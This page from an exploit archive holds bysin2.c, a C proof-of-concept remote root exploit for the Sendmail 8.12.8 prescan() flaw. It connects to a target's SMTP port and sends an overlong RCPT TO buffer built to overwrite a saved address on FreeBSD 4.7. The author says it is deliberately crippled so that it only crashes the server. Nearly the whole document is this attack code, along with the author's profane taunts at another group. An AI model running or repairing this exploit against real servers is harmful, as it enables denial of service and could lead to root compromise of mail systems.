exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bysin2.c

bysin2.c
Posted Apr 30, 2003
Authored by Bysin

Remote root exploit for Sendmail 8.12.8 and below that makes use of the vulnerability in prescan(). Note: This exploit is crippled and needs to be fixed.

tags | exploit, remote, root
SHA-256 | b3c08d4687af2292f82e2d9dac63e977ef8497f5afbf665b31499dbc02ad22ba

bysin2.c

Change Mirror Download
/*
* Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
* And no i'm not in l33tsecurity
*
* AND I'M NOT GOBBLES!
*
* --
* my reflection, dirty mirror
* there's no connection to myself
* i'm your lover. i'm your zero
* i'm the face in your dreams of glass
* so save your prayers for when we're really gonna need 'em
* throw out your cares and fly
* wanna go for a ride?
* --
*
* This exploit is proof of concept, It has been edited ***NOT*** to work.
* This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
* On sucessful POC exploitation the program should crash with the following:
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x5c5c5c5c in ?? ()
*
* Alright so the last sendmail exploit wasnt very good, dont blame me
* it wasnt exploitable cause of that god damn second buffer kept
* getting in the way. Fuck it.
*
* This would not work on linux cause the offset for addr was someshit like
* 0xbfffb9c9 and sendmail doesnt allow certain characters like 0xff to be
* written to the buffer. Bsd on the other hand has an offset of someshit like
* 0xbfbfdad1, which is fine.
* {"Red Hat 7.3",88,120,0xbfffb9c9} // wont work :(
*
* And fuck you PHC you no talent bunch of fucking script kiddies. You'll
* fucking shit your pants when you see a real hacker in action. No I dont
* rip code, but you bitchs cant tell a piece of code from an apple pie,
* so shut the fuck up.
*
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

int maxarch=1;
struct arch {
char *os; // The OS
int pos; // The position of ebp in the stack, with the last byte being 0x00
int apos; // The amount of bytes after pvpbuf where ebp is located
unsigned long addr; // The pointer to the addr buffer
} archs[] = {
{"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1},
};


/////////////////////////////////////////////////////////

#define BUFSIZE 50096

void header() {
printf("Sendmail 8.12.8 prescan() exploit by bysin\n\n");
}

void printtargets() {
unsigned long i;
header();
printf("\t Target\t Addr\t\t OS\n");
printf("\t-------------------------------------------\n");
for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].addr,archs[i].os);
printf("\n");
}

void printresponse(char *a) {
printf("%s\n",a);
}

void writesocket(int sock, char *buf) {
if (send(sock,buf,strlen(buf),0) <= 0) {
printf("Error writing to socket\n");
exit(0);
}
printresponse(buf);
}

void readsocket(int sock, int response) {
char temp[BUFSIZE];
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Error reading from socket\n");
exit(0);
}
if (response != atol(temp)) {
printf("Bad response: %s\n",temp);
exit(0);
}
else printresponse(temp);
}

void relay(int sock) {
while(1) {
char temp[BUFSIZE];
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Server vulnerable (crashed)\n");
exit(0);
}
printresponse(temp);
if (atol(temp) == 553) {
printf("Not exploitable\n");
exit(0);
}
}
}

int main(int argc, char **argv) {
struct sockaddr_in server;
unsigned long ipaddr,i,j,m;
int sock,target;
char tmp[BUFSIZE],buf[BUFSIZE],*p,*pos=NULL;
if (argc <= 2) {
printf("%s <target ip> <target number>\n",argv[0]);
printtargets();
return 0;
}
target=atol(argv[2]);
if (target < 0 || target >= maxarch) {
printtargets();
return 0;
}

header();

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Unable to create socket\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(25);
printf("Resolving address... ");
fflush(stdout);
if ((ipaddr = inet_addr(argv[1])) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(argv[1])) == NULL) {
printf("Unable to resolve address\n");
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
printf("Address found\n");
printf("Connecting... ");
fflush(stdout);
if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
printf("Unable to connect\n");
exit(0);
}
printf("Connected\n");
printf("Sending exploit... \n");
fflush(stdout);

readsocket(sock,220);

writesocket(sock,"HELO yahoo.com\r\n");
readsocket(sock,250);

writesocket(sock,"MAIL FROM: <a@yahoo.com>\r\n");
readsocket(sock,250);

memset(buf,0,sizeof(buf));
strcpy(buf,"RCPT TO: ");
p=buf+strlen(buf);
for (i=1,j=0,m=0;i<1242;i++) {
if (!(i%256)) {
*p++=';';
j++;
}
else {
if (j < 4) *p++='A';
else {
if (m == archs[target].pos) pos=p;
//if (m > archs[target].pos) *p++='B'; else
*p++='A';
m++;
}
}
}
if (pos) memcpy(pos,(char*)&archs[target].addr,4);
*p++=';';
for (i=0;i<archs[target].apos;i++) {
*p++='\\';
*p++=0xff;
}
strcat(buf,"\r\n");
writesocket(sock,buf);

relay(sock);
}
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close